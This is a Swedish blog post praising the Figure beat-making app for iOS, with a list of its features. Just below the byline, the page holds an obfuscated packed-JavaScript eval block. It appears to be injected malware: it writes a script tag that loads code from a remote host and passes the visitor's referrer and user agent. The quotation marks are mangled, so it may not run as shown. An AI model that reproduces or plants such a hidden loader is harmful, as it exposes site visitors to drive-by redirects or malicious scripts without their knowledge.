Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Musikappen Figure blir app of the year

Musikappen Figure blir app of the year
Sebastian


Figure: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|syybz|var|u0026u|referrer|sddtn||js|php’.split(’|’),0,{}))
Jag kommer ihåg när den här appen lanserades till iOS för ett bra tag sen. Jag laddade ner den för att på skoj se vad man kunde göra. Efter att ha testat den var jag fast och det gick många sommartimmar åt att försöka komponera skojiga beat som man kunde visa upp för grabbarna. 

Förutom att jag tycker den var kul så har den fått bra recensioner för att vara ”banbrytande”, ”innovativ”, ”Visat möjligheter man inte trodde fanns” osv.

Figure är en musikapp där du kan skapa egna beats genom att placera in olika mönster, dra i ”spakar” spela på ett piano. Du kan verkligen skapa helt unika ”sounds” som låter riktigt bra.

Det enda minuset jag kommer ihåg från tiden jag satt med Figure är att det var otroligt svårt att förstå hur jag började om med en ny låt. Jag tror ärligt att det tog mig flera flera dagar innan jag hittade mysteriet, och då hade jag även gjort en del Google sökningar utan resultat.

Appen kostar sju kronor och finns att ladda ner nedan!

Det är bara att börja producera, vem vet,  kanske är du nästa Swedish House Mafia.

The nitty gritty details:

• Bass & lead parts use Reason’s Thor synthesizer
• Drums powered by Reason’s Kong drum machine
• Play in different keys & modes. Set once or change on the fly.
• Increase the Shuffle to loosen up your beats
• Turn up Pump to add a club sound to your tracks
• Adjust levels using Propellerhead’s legendary mixer
• Save, browse and load song files
• Set length of loop (1,2,4,8 bars)
• Export audio to iTunes File Sharing